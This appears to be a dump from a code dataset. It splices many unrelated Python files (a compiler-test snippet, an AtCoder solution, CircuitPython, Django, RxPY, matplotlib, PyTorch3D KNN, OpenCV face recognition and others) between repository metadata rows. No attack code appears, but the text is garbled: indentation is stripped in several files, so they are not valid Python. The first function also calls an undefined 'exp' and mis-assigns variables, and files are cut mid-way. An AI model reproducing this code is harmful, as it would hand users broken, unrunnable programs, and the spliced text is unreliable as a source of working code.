def exp5(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int, x5: int, y5: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
# Input parameter
n:int = 42
n2:int = 42
n3:int = 42
n4:int = 42
n5:int = 42
# Run [0, n]
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
while i <= n:
print(exp(2, i % 31))
i = i + 1 | [
"[email protected]"
] | |
a6754e24060dada2bc601f991212c3b62a574c61 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02927/s825032151.py | 0c0da2fdaf320f22fbbb8c13954eeb5e830d6169 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | M, D = map(int, input().split())
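# f(m, d) is True on a "product day": both digits of day d are at least 2
# and the product of those digits equals the month m.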
def f(m, d):
d1, d10 = d % 10, d // 10
return d1 >= 2 and d10 >= 2 and d1 * d10 == m
count = 0
for i in range(1, M+1):
for j in range(1, D + 1):
count += 1 if f(i, j) else 0
print(count) | [
"[email protected]"
] | |
f37ce077214372ee2aa95bf55c151a14a1b54739 | 49cb4e39c562c0cca9b8eaf09aeb10689d3f8e8f | /test/expr.py | 3911c63c184a67db061627b9626c0d1f66507423 | [] | no_license | 2020saurav/py-codegen | 2df470025e60bb157522de5eb92a467646bbd181 | dca61d31faf41bd05aff8399daed3612211d77c2 | refs/heads/master | 2021-01-01T20:11:01.476604 | 2015-04-14T18:28:08 | 2015-04-14T18:28:08 | 33,630,589 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | a = 100
while a > 0:
if a % 5 == 0:
print a
if a%37 == 0:
break
a = a - 1
print a | [
"[email protected]"
] | |
f5321f3e48bf46ddb5a487c404d82dbee8b6acfd | 0124528676ee3bbaec60df5d6950b408e6da37c8 | /Projects/QTPy/adafruit-circuitpython-bundle-7.x-mpy-20220601/examples/irremote_transmit.py | 9595f492cf2210c7860dca7d88ef446d35ffbe60 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | land-boards/lb-boards | 8127658dc537dcfde0bb59a5018ab75c3f0087f6 | eeb98cc2003dac1924845d949f6f5bd387376568 | refs/heads/master | 2023-06-07T15:44:46.110742 | 2023-06-02T22:53:24 | 2023-06-02T22:53:24 | 4,847,305 | 10 | 12 | null | null | null | null | UTF-8 | Python | false | false | 968 | py | # SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
"""IR transmit example using Circuit Playground Express"""
# pylint: disable-msg=no-member
import time
import pulseio
import pwmio
import board
import digitalio
import adafruit_irremote
# Create a button object to trigger IR transmit
button = digitalio.DigitalInOut(board.D4)
button.direction = digitalio.Direction.INPUT
button.pull = digitalio.Pull.DOWN
# Create a 'pwmio' output, to send infrared signals on the IR transmitter @ 38KHz
pwm = pwmio.PWMOut(board.IR_TX, frequency=38000, duty_cycle=2**15)
pulseout = pulseio.PulseOut(pwm)
# Create an encoder that will take numbers and turn them into NEC IR pulses
encoder = adafruit_irremote.GenericTransmit(
header=[9500, 4500], one=[550, 550], zero=[550, 1700], trail=0
)
while True:
if button.value:
print("IR signal sent!")
encoder.transmit(pulseout, [255, 2, 255, 0])
time.sleep(0.2)
| [
"[email protected]"
] | |
8b3821d319dca7c778f383c3838af711f2438bfd | 56f998d88a4cdae9f2c99b6f2013a10b90f227a2 | /network/admin.py | 8010ed3923c1ded4a1326c43ba9b78eac1fbe675 | [] | no_license | lautarodapin/network-course-cs50 | a45cfa675b7ff475ee1600276cbf47eb19fca7d9 | 2994c6b44eb46f4d303621a4e48604aa672017ea | refs/heads/main | 2023-04-02T06:42:14.599721 | 2021-04-09T20:57:18 | 2021-04-09T20:57:18 | 355,749,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from django.contrib import admin
from .models import Post, User, Comment
class CommentInline(admin.TabularInline):
model = Comment
extra = 0
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = [
"id",
"content",
"likes",
"user",
]
inlines = [CommentInline]
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
list_display = [
"id",
"username",
]
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = [
"id",
"comment",
"user",
"post",
]
| [
"[email protected]"
] | |
97afbf06615fccf029968bf34a0bc4e21e70c552 | 5c74f8526f185d90093aba3fb213a11de5ea18ba | /rx/operators/observable/observeon.py | 8455b848d1b064d10076f186fa1593f02c7659e2 | [
"Apache-2.0"
] | permissive | yutiansut/RxPY | df02c64cb791bf2a7a97413a75f4d2903e1682b5 | c3bbba77f9ebd7706c949141725e220096deabd4 | refs/heads/master | 2020-03-10T11:07:27.642494 | 2018-12-29T07:02:02 | 2018-12-29T07:02:02 | 129,349,161 | 0 | 0 | NOASSERTION | 2018-12-29T07:02:03 | 2018-04-13T04:50:02 | Python | UTF-8 | Python | false | false | 794 | py | from rx.core import AnonymousObservable, ObservableBase
from rx.core.observeonobserver import ObserveOnObserver
def observe_on(source, scheduler) -> ObservableBase:
"""Wraps the source sequence in order to run its observer callbacks
on the specified scheduler.
Keyword arguments:
scheduler -- Scheduler to notify observers on.
Returns the source sequence whose observations happen on the
specified scheduler.
This only invokes observer callbacks on a scheduler. In case the
subscription and/or unsubscription actions have side-effects
    that need to run on a scheduler, use subscribe_on.
"""
def subscribe(observer, _=None):
return source.subscribe(ObserveOnObserver(scheduler, observer))
return AnonymousObservable(subscribe)
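# Minimal usage sketch (the observable `xs` and `some_scheduler` below are
# placeholders, not defined in this module):
#   subscription = observe_on(xs, some_scheduler).subscribe(print)
# Observer callbacks (on_next/on_error/on_completed) then fire on the given
# scheduler, while subscribing itself still happens on the calling thread.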
| [
"[email protected]"
] | |
44f00df1320decf7dfa7e83714f2c1c267a32738 | 9d461bb7e7db942654a819fd544dd6e59e671841 | /gui_test.py | 179acc4ff415a686fb2d97162ac3584cbf8d961d | [] | no_license | vimcoper/qt_candle_chart | 193644057a43ef068292f2bd61e713530485f8e9 | 205c493e3e374562142eaac9992f73be9e0b9d98 | refs/heads/master | 2022-07-19T09:03:31.396671 | 2020-05-25T08:19:57 | 2020-05-25T08:19:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,135 | py | import sys
import time
import numpy as np
from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5
if is_pyqt5():
from matplotlib.backends.backend_qt5agg import (
FigureCanvas, NavigationToolbar2QT as NavigationToolbar)
else:
from matplotlib.backends.backend_qt4agg import (
FigureCanvas, NavigationToolbar2QT as NavigationToolbar)
from matplotlib.figure import Figure
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self._main = QtWidgets.QWidget()
print(self._main)
self.setCentralWidget(self._main)
layout = QtWidgets.QVBoxLayout(self._main)
static_canvas = FigureCanvas(Figure(figsize=(5, 3)))
layout.addWidget(static_canvas)
# self.addToolBar(NavigationToolbar(static_canvas, self))
dynamic_canvas = FigureCanvas(Figure(figsize=(5, 3)))
layout.addWidget(dynamic_canvas)
# self.addToolBar(QtCore.Qt.BottomToolBarArea,
# NavigationToolbar(dynamic_canvas, self))
self._static_ax = static_canvas.figure.subplots()
t = np.linspace(0, 10, 501)
self._static_ax.plot(t, np.tan(t), ".")
self._dynamic_ax = dynamic_canvas.figure.subplots()
self._timer = dynamic_canvas.new_timer(
50, [(self._update_canvas, (), {})])
self._timer.start()
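        # The canvas timer fires every 50 ms and calls _update_canvas, which
        # redraws the shifting sine wave on the dynamic canvas.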
def _update_canvas(self):
self._dynamic_ax.clear()
t = np.linspace(0, 10, 101)
# Use fixed vertical limits to prevent autoscaling changing the scale
# of the axis.
self._dynamic_ax.set_ylim(-1.1, 1.1)
# Shift the sinusoid as a function of time.
self._dynamic_ax.plot(t, np.sin(t + time.time()))
self._dynamic_ax.figure.canvas.draw()
if __name__ == "__main__":
# Check whether there is already a running QApplication (e.g., if running
# from an IDE).
qapp = QtWidgets.QApplication.instance()
if not qapp:
qapp = QtWidgets.QApplication(sys.argv)
app = ApplicationWindow()
app.show()
app.activateWindow()
app.raise_()
qapp.exec_() | [
"[email protected]"
] | |
1e257cc346957e4e15add00df2f9cfc675ebce1c | 61a72b019346d10c502f7ed4d4894adbfe03c8cb | /legacy/structures.py | fd6f19c85c10d4ae631646b1bc26fe6ea01bdf4c | [
"BSD-2-Clause"
] | permissive | numba/numba-examples | 10617ced993e1f756595152711c1b6abe8d180a9 | c423f5419a459f5ab8874fda6d39bb5ea05d04b2 | refs/heads/master | 2023-08-23T15:33:21.729427 | 2022-06-27T22:54:27 | 2022-06-27T22:54:27 | 96,823,247 | 168 | 62 | BSD-2-Clause | 2022-09-29T19:24:53 | 2017-07-10T21:32:44 | Jupyter Notebook | UTF-8 | Python | false | false | 547 | py | #!/usr/bin/env python
from __future__ import print_function, division, absolute_import
import numpy as np
from numba import jit
record_type = np.dtype([('x', np.double), ('y', np.double)])
a = np.array([(1.0, 2.0), (3.0, 4.0)], dtype=record_type)
@jit
def hypot(data):
result = np.empty_like(data, dtype=np.float64)
# notice access to structure elements 'x' and 'y' via attribute access
for i in range(data.shape[0]):
result[i] = np.sqrt(data[i].x * data[i].x + data[i].y * data[i].y)
return result
print(hypot(a))
| [
"[email protected]"
] | |
ea5cf27bff17dbb8236475b3e8ee6c32c4dfa01f | 5c928e2b5024920d26c93f4b06e93c08a3e61294 | /portal_rnaseq_galaxy/scripts/api/copy_history_dataset_to_history.py | ec02564972b8186fd5dc669fbf1280a839f997fa | [
"CC-BY-2.5",
"AFL-2.1",
"AFL-3.0",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | BioinformaticsArchive/PathogenPortal | c390cf78299595d170b20a105afdd5200200ddaf | d4b1e525e7e91ce32ec29998a7bcb5a1415706a3 | refs/heads/master | 2021-01-22T12:49:48.599355 | 2013-08-13T16:16:13 | 2013-08-13T16:16:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | #!/usr/bin/env python
import os, sys
sys.path.insert( 0, os.path.dirname( __file__ ) )
from common import submit
try:
assert sys.argv[3]
data = {}
data['from_hda_id'] = sys.argv[3]
except IndexError:
print 'usage: %s key url hda_file_id' % os.path.basename( sys.argv[0] )
    print '  hda_file_id is the encoded id of the history dataset (HDA) to copy'
sys.exit( 1 )
submit( sys.argv[1], sys.argv[2], data )
| [
"[email protected]"
] | |
bf5c50208a3d1421abd348492423884ea0e9bb6f | 60317dc519af01c33a9b0f507924fd51c44541df | /iMii_v9/venv/bin/pygmentize | 1c281685d51694efc96f7519d8d42ff5271f05da | [] | no_license | Durant21/iMii_v9 | b538450c8a9e7ca1c852270c2641f91083bd4270 | 338ff9adab7b0d794d84553f7cf380ac10e47761 | refs/heads/master | 2022-10-12T16:03:16.931696 | 2019-07-08T02:54:03 | 2019-07-08T02:54:03 | 195,724,107 | 0 | 1 | null | 2022-10-10T17:32:12 | 2019-07-08T02:40:19 | Python | UTF-8 | Python | false | false | 406 | #!/home/dante/Projects/iMii/v9/iMii_v9/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'Pygments','console_scripts','pygmentize'
__requires__ = 'Pygments'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('Pygments', 'console_scripts', 'pygmentize')()
)
| [
"[email protected]"
] | ||
4a2caa48c63041ee507c0375de604edc7effa7d2 | cc6a674cab1dc959189b9edff975625f4815bc1c | /Transformers-from-scratch/examples/set_context.py | 2317e03224a6ee1213b8d2ce86f2a61db92c7e66 | [
"MIT"
] | permissive | shreyansh26/DL-Code-Repository | 15173042f566ea42f96eb65283347927a2fab4ff | f1974eedc1fef54b2d274703390a22721e46f502 | refs/heads/master | 2023-07-15T23:15:05.484609 | 2021-08-30T15:41:20 | 2021-08-30T15:41:20 | 382,834,342 | 0 | 0 | null | 2021-07-04T12:11:08 | 2021-07-04T11:27:13 | Python | UTF-8 | Python | false | false | 203 | py | import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../tfb')))
import tfb | [
"[email protected]"
] | |
ae0760e8766262053cf1d4a77e9a84e482e76efa | 9f714608155e7f8b92cea3dd4bda78f3ac1f56a2 | /Resume/put_item.py | a58e932cec941fad48372545f0eed3a34fb0491c | [] | no_license | yenkuanlee/FoodResume | 0258dbaf29ac3efc864b47b70fdc14b8acc37dac | 2e7bff23235d569cf4caaba86f956b1bad749082 | refs/heads/master | 2020-03-20T23:58:25.545722 | 2018-07-09T04:12:37 | 2018-07-09T04:12:37 | 137,871,950 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 839 | py | # -*- coding: utf-8 -*-
import json
from web3 import Web3, HTTPProvider, TestRPCProvider
from web3.contract import ConciseContract
import os
import sys
Cpath = os.path.dirname(os.path.realpath(__file__))
host = 'localhost'
#account = '0x42946c2bb22ad422e7366d68d3ca07fb1862ff36' ## supplier
account = '0xe6ab871f860d9f28764d5d2e0672396a7643710e' ## gmeal
passwd = '123'
# web3.py instance
w3 = Web3(HTTPProvider('http://'+host+':3000'))
w3.personal.unlockAccount(account,passwd)
f = open(Cpath+'/resume.json','r')
line = f.readline()
Jline = json.loads(line)
f.close()
abi = Jline['abi']
contract_address = Jline['contract_address']
# Contract instance in concise mode
contract_instance = w3.eth.contract(abi, contract_address, ContractFactoryClass=ConciseContract)
contract_instance.Record(sys.argv[1],transact={'from': account})
| [
"[email protected]"
] | |
1b73f4236d71f8b4f37038833d494e5d23ba0b35 | 87b904ebf11d416567a7e49b91b8e9934f67c6f3 | /show_df_as_html_table.py | d8dd6bfadb056408f98c24475be1fe9ce25d2c20 | [
"MIT"
] | permissive | NathanKr/pandas-playground | a701f524aa48f22f6680e48c597206e10f8222e5 | a5355c59cb61ca3a7dcce590ed42d56a6b943783 | refs/heads/main | 2023-06-05T11:07:52.061327 | 2021-07-02T02:35:15 | 2021-07-02T02:35:15 | 328,917,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import pandas as pd
import os
url = 'https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'
snp500_df = pd.read_html(url)[0]
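# read_html returns a list of DataFrames, one per <table> found on the page;
# [0] keeps the first table. Note that pandas needs an HTML parser such as
# lxml or html5lib installed for read_html to work.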
file_path = os.path.join('temp','snp500_df_to_html.html')
print(f'write snp500_df to {file_path}')
snp500_df.to_html(file_path)
| [
"[email protected]"
] | |
a59830d94f066732fabbf3056710ff933a7aef39 | dddbc7dea28cc36fb110f83acbc4b6290c9dea2d | /Final/playground.py | 88ae3ba8f2832e52c36bc0d0c8f6f3411df0c682 | [] | no_license | rubcuadra/TC2025_PA | 82551d6b10a214b99a4d7110492c7c0c01188eed | 1893e1950709db009933d3f9ae9a84e9d8354241 | refs/heads/master | 2020-03-27T15:06:26.398245 | 2018-11-28T00:28:26 | 2018-11-28T00:28:26 | 146,698,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | from onitampy.board import OnitamaBoard
from onitampy.movements import OnitamaCards,DECK_INDEXES
if __name__ == '__main__':
board = OnitamaBoard()
# print(board)
board.cards[0].pop()
board.cards[0].pop()
board.cards[0].add('EEL')
board.cards[0].add('COBRA')
board.cards[1].pop()
board.cards[1].pop()
board.cards[1].add('GOOSE')
board.cards[1].add('CRAB')
print(board.canMove( board.BLUE, (4,2),"EEL",(3,1))) | [
"[email protected]"
] | |
1c255e182e83fd5efcc23f3fcd88ce421d2cfc4b | ff58ba25d940ed34d9684efab04adef85d1e1c0f | /src/management/__init__.py | 1cef4964de4e5953fc495c1d642a6ac0fde493ef | [] | no_license | afsmith/Kneto-Sello | e9046a81ff83652531adc55aab3f90f77af5b5be | a1b12daf8a04ef485ddcaa2944b2d87878a8cdd0 | refs/heads/master | 2021-03-27T17:31:23.830989 | 2013-06-04T07:29:58 | 2013-06-04T07:29:58 | 6,720,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2010 BLStream Sp. z o.o. (http://blstream.com/)
#
# Authors:
# Marek Mackiewicz <[email protected]>
#
"""Application for user management.
This application handles management of users and their permissions.
"""
# vim: set et sw=4 ts=4 sts=4 tw=78: | [
"[email protected]"
] | |
d2df797bf59936294a95a37b0c05d5cde507fd78 | 78137d5e4e688749399bbb386b26536e4ac6d9fa | /pytorch3d/ops/knn.py | 72e3c28959b15d4b4cf7e2ae55fa45530c2401de | [
"MIT",
"BSD-3-Clause"
] | permissive | bruinxiong/pytorch3d | 4235681c6356f7e69fa506d8474a3c7cf83d9fe6 | 18a3c5cbb9055bcda44590d39db65bb0c74db799 | refs/heads/master | 2022-06-18T16:28:39.589229 | 2022-05-18T20:11:36 | 2022-05-18T20:11:36 | 238,892,798 | 0 | 0 | NOASSERTION | 2022-05-18T20:11:37 | 2020-02-07T10:04:39 | Python | UTF-8 | Python | false | false | 10,403 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from collections import namedtuple
from typing import Union
import torch
from pytorch3d import _C
from torch.autograd import Function
from torch.autograd.function import once_differentiable
_KNN = namedtuple("KNN", "dists idx knn")
class _knn_points(Function):
"""
Torch autograd Function wrapper for KNN C++/CUDA implementations.
"""
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
ctx,
p1,
p2,
lengths1,
lengths2,
K,
version,
norm: int = 2,
return_sorted: bool = True,
):
"""
K-Nearest neighbors on point clouds.
Args:
p1: Tensor of shape (N, P1, D) giving a batch of N point clouds, each
containing up to P1 points of dimension D.
p2: Tensor of shape (N, P2, D) giving a batch of N point clouds, each
containing up to P2 points of dimension D.
lengths1: LongTensor of shape (N,) of values in the range [0, P1], giving the
length of each pointcloud in p1. Or None to indicate that every cloud has
length P1.
lengths2: LongTensor of shape (N,) of values in the range [0, P2], giving the
length of each pointcloud in p2. Or None to indicate that every cloud has
length P2.
K: Integer giving the number of nearest neighbors to return.
version: Which KNN implementation to use in the backend. If version=-1,
the correct implementation is selected based on the shapes of the inputs.
norm: (int) indicating the norm. Only supports 1 (for L1) and 2 (for L2).
return_sorted: (bool) whether to return the nearest neighbors sorted in
ascending order of distance.
Returns:
p1_dists: Tensor of shape (N, P1, K) giving the squared distances to
the nearest neighbors. This is padded with zeros both where a cloud in p2
has fewer than K points and where a cloud in p1 has fewer than P1 points.
p1_idx: LongTensor of shape (N, P1, K) giving the indices of the
K nearest neighbors from points in p1 to points in p2.
Concretely, if `p1_idx[n, i, k] = j` then `p2[n, j]` is the k-th nearest
neighbors to `p1[n, i]` in `p2[n]`. This is padded with zeros both where a cloud
in p2 has fewer than K points and where a cloud in p1 has fewer than P1 points.
"""
if not ((norm == 1) or (norm == 2)):
raise ValueError("Support for 1 or 2 norm.")
idx, dists = _C.knn_points_idx(p1, p2, lengths1, lengths2, norm, K, version)
# sort KNN in ascending order if K > 1
if K > 1 and return_sorted:
if lengths2.min() < K:
P1 = p1.shape[1]
mask = lengths2[:, None] <= torch.arange(K, device=dists.device)[None]
# mask has shape [N, K], true where dists irrelevant
mask = mask[:, None].expand(-1, P1, -1)
# mask has shape [N, P1, K], true where dists irrelevant
dists[mask] = float("inf")
dists, sort_idx = dists.sort(dim=2)
dists[mask] = 0
else:
dists, sort_idx = dists.sort(dim=2)
# pyre-fixme[16]: `Tensor` has no attribute `gather`.
idx = idx.gather(2, sort_idx)
ctx.save_for_backward(p1, p2, lengths1, lengths2, idx)
ctx.mark_non_differentiable(idx)
ctx.norm = norm
return dists, idx
@staticmethod
@once_differentiable
def backward(ctx, grad_dists, grad_idx):
p1, p2, lengths1, lengths2, idx = ctx.saved_tensors
norm = ctx.norm
# TODO(gkioxari) Change cast to floats once we add support for doubles.
if not (grad_dists.dtype == torch.float32):
grad_dists = grad_dists.float()
if not (p1.dtype == torch.float32):
p1 = p1.float()
if not (p2.dtype == torch.float32):
p2 = p2.float()
grad_p1, grad_p2 = _C.knn_points_backward(
p1, p2, lengths1, lengths2, idx, norm, grad_dists
)
return grad_p1, grad_p2, None, None, None, None, None, None
def knn_points(
p1: torch.Tensor,
p2: torch.Tensor,
lengths1: Union[torch.Tensor, None] = None,
lengths2: Union[torch.Tensor, None] = None,
norm: int = 2,
K: int = 1,
version: int = -1,
return_nn: bool = False,
return_sorted: bool = True,
) -> _KNN:
"""
K-Nearest neighbors on point clouds.
Args:
p1: Tensor of shape (N, P1, D) giving a batch of N point clouds, each
containing up to P1 points of dimension D.
p2: Tensor of shape (N, P2, D) giving a batch of N point clouds, each
containing up to P2 points of dimension D.
lengths1: LongTensor of shape (N,) of values in the range [0, P1], giving the
length of each pointcloud in p1. Or None to indicate that every cloud has
length P1.
lengths2: LongTensor of shape (N,) of values in the range [0, P2], giving the
length of each pointcloud in p2. Or None to indicate that every cloud has
length P2.
norm: Integer indicating the norm of the distance. Supports only 1 for L1, 2 for L2.
K: Integer giving the number of nearest neighbors to return.
version: Which KNN implementation to use in the backend. If version=-1,
the correct implementation is selected based on the shapes of the inputs.
return_nn: If set to True returns the K nearest neighbors in p2 for each point in p1.
return_sorted: (bool) whether to return the nearest neighbors sorted in
ascending order of distance.
Returns:
dists: Tensor of shape (N, P1, K) giving the squared distances to
the nearest neighbors. This is padded with zeros both where a cloud in p2
has fewer than K points and where a cloud in p1 has fewer than P1 points.
idx: LongTensor of shape (N, P1, K) giving the indices of the
K nearest neighbors from points in p1 to points in p2.
Concretely, if `p1_idx[n, i, k] = j` then `p2[n, j]` is the k-th nearest
neighbors to `p1[n, i]` in `p2[n]`. This is padded with zeros both where a cloud
in p2 has fewer than K points and where a cloud in p1 has fewer than P1
points.
nn: Tensor of shape (N, P1, K, D) giving the K nearest neighbors in p2 for
each point in p1. Concretely, `p2_nn[n, i, k]` gives the k-th nearest neighbor
for `p1[n, i]`. Returned if `return_nn` is True.
The nearest neighbors are collected using `knn_gather`
.. code-block::
p2_nn = knn_gather(p2, p1_idx, lengths2)
which is a helper function that allows indexing any tensor of shape (N, P2, U) with
the indices `p1_idx` returned by `knn_points`. The output is a tensor
of shape (N, P1, K, U).
"""
if p1.shape[0] != p2.shape[0]:
raise ValueError("pts1 and pts2 must have the same batch dimension.")
if p1.shape[2] != p2.shape[2]:
raise ValueError("pts1 and pts2 must have the same point dimension.")
p1 = p1.contiguous()
p2 = p2.contiguous()
P1 = p1.shape[1]
P2 = p2.shape[1]
if lengths1 is None:
lengths1 = torch.full((p1.shape[0],), P1, dtype=torch.int64, device=p1.device)
if lengths2 is None:
lengths2 = torch.full((p1.shape[0],), P2, dtype=torch.int64, device=p1.device)
# pyre-fixme[16]: `_knn_points` has no attribute `apply`.
p1_dists, p1_idx = _knn_points.apply(
p1, p2, lengths1, lengths2, K, version, norm, return_sorted
)
p2_nn = None
if return_nn:
p2_nn = knn_gather(p2, p1_idx, lengths2)
return _KNN(dists=p1_dists, idx=p1_idx, knn=p2_nn if return_nn else None)
def knn_gather(
x: torch.Tensor, idx: torch.Tensor, lengths: Union[torch.Tensor, None] = None
):
"""
A helper function for knn that allows indexing a tensor x with the indices `idx`
returned by `knn_points`.
For example, if `dists, idx = knn_points(p, x, lengths_p, lengths, K)`
where p is a tensor of shape (N, L, D) and x a tensor of shape (N, M, D),
then one can compute the K nearest neighbors of p with `p_nn = knn_gather(x, idx, lengths)`.
It can also be applied for any tensor x of shape (N, M, U) where U != D.
Args:
x: Tensor of shape (N, M, U) containing U-dimensional features to
be gathered.
idx: LongTensor of shape (N, L, K) giving the indices returned by `knn_points`.
lengths: LongTensor of shape (N,) of values in the range [0, M], giving the
length of each example in the batch in x. Or None to indicate that every
example has length M.
Returns:
x_out: Tensor of shape (N, L, K, U) resulting from gathering the elements of x
with idx, s.t. `x_out[n, l, k] = x[n, idx[n, l, k]]`.
If `k > lengths[n]` then `x_out[n, l, k]` is filled with 0.0.
"""
N, M, U = x.shape
_N, L, K = idx.shape
if N != _N:
raise ValueError("x and idx must have same batch dimension.")
if lengths is None:
lengths = torch.full((x.shape[0],), M, dtype=torch.int64, device=x.device)
idx_expanded = idx[:, :, :, None].expand(-1, -1, -1, U)
# idx_expanded has shape [N, L, K, U]
x_out = x[:, :, None].expand(-1, -1, K, -1).gather(1, idx_expanded)
# p2_nn has shape [N, L, K, U]
needs_mask = lengths.min() < K
if needs_mask:
# mask has shape [N, K], true where idx is irrelevant because
# there is less number of points in p2 than K
mask = lengths[:, None] <= torch.arange(K, device=x.device)[None]
# expand mask to shape [N, L, K, U]
mask = mask[:, None].expand(-1, L, -1)
mask = mask[:, :, :, None].expand(-1, -1, -1, U)
x_out[mask] = 0.0
return x_out
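# Example usage (illustrative sketch; the tensors below are hypothetical):
#   p1 = torch.randn(2, 128, 3)   # batch of 2 clouds with 128 points each
#   p2 = torch.randn(2, 256, 3)   # batch of 2 clouds with 256 points each
#   dists, idx, nn = knn_points(p1, p2, K=4, return_nn=True)
#   # dists: (2, 128, 4) squared L2 distances, idx: (2, 128, 4) indices into p2,
#   # nn: (2, 128, 4, 3) gathered neighbor coordinates (same as knn_gather(p2, idx)).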
| [
"[email protected]"
] | |
885b4a9b841ec2f7c0f895d76b18602485199964 | 846b11ccf549aba144c1824a24292a4850860ca7 | /5-ExerciciosFuncoes/4.py | dcb657a9902f0c3fd3e9da6f637323357681ce71 | [] | no_license | paulocesarcsdev/ExerciciosPython | 6d1feff293e7efc4cd3fbc62eee0add93f76db99 | 25bfaa6dc5cb294242e478a2b253a8ca5d9c7078 | refs/heads/master | 2023-05-15T00:53:22.151884 | 2021-06-10T03:04:04 | 2021-06-10T03:04:04 | 337,847,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | '''
Write a program with a function that takes one argument.
The function returns the character value 'P' if its argument is positive, and 'N' if its argument is zero or negative.
'''
def peso(valor):
    if valor > 0:
return " 'P' "
else:
return " 'N' "
numero = int(input('Enter the value: '))
print(peso(numero)) | [
"[email protected]"
] | |
148b5b1f7ca8a9c5547ea64c99330d158348a5a4 | 9ac6fda4872f67faf8ce3cb541f10cea692e72ee | /main.py | 28467183158d45176c947599464a73fb8bbdd146 | [] | no_license | markbirds/OpenCV-Face-Recognition | 4db776d286313d9d93d464a4bce131add1f0921a | f486e3e0e37c4cd6cb23818a17f09194bfd9582e | refs/heads/master | 2023-02-08T01:01:22.442349 | 2021-01-04T13:06:45 | 2021-01-04T13:06:45 | 326,679,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py | import numpy as np
import cv2
import json
# loading features to be used for face detection
face_cascade = cv2.CascadeClassifier('src/haar_cascades/haarcascade_frontalface_default.xml')
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.read("./src/recognizer/face_trained.yml")
with open('./src/recognizer/registered_faces.json') as f:
registered_faces = json.load(f)['registered_faces']
# capture live feed from webcam
cap = cv2.VideoCapture(0)
while(True):
    # read frames and convert to grayscale
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# get coordinates of faces
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
# draw rectangle around face roi
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
face_roi_gray = gray[y:y+h, x:x+w]
id_, conf = face_recognizer.predict(face_roi_gray)
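        # For LBPH, `conf` is a distance-like score (lower means a closer match);
        # it is unused here, but could be thresholded to reject unknown faces.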
font = cv2.FONT_HERSHEY_SIMPLEX
name = registered_faces[id_]
color = (255, 255, 255)
stroke = 2
cv2.putText(frame, name, (x,y-20), font, 1, color, stroke, cv2.LINE_AA)
# display resulting frame
cv2.imshow('Face detection',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
402d662f1e8116b3c4afdf8427dc4cddb4b05546 | 2d276785c3663d4798be462115291c4706dbd255 | /Python从菜鸟到高手/chapter5/demo5.04.py | 5cbb5b358fee5ddbaa83e6d82be4b05bab815d51 | [] | no_license | bupthl/Python | 81c92433bd955663e6cda5fe7cab5ea3d067c3de | bdb33aeeb179a43100b9ef7129a925c63a133fd3 | refs/heads/master | 2022-02-21T11:02:40.195265 | 2019-08-16T05:49:18 | 2019-08-16T05:49:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,689 | py | '''
-------- Source code for "Python: From Novice to Master" (《Python从菜鸟到高手》) ------------
Copyright Orui Technology (欧瑞科技). All rights reserved.
Author: Li Ning (李宁)
For any technical questions, join the QQ discussion group: 264268059,
or follow the "Geekori" (极客起源) subscription account or the "Orui Technology" (欧瑞科技) service account; the QR codes are in the source root directory.
If the QQ group is full, visit https://geekori.com to find the latest group, and scan the codes there to follow the official accounts.
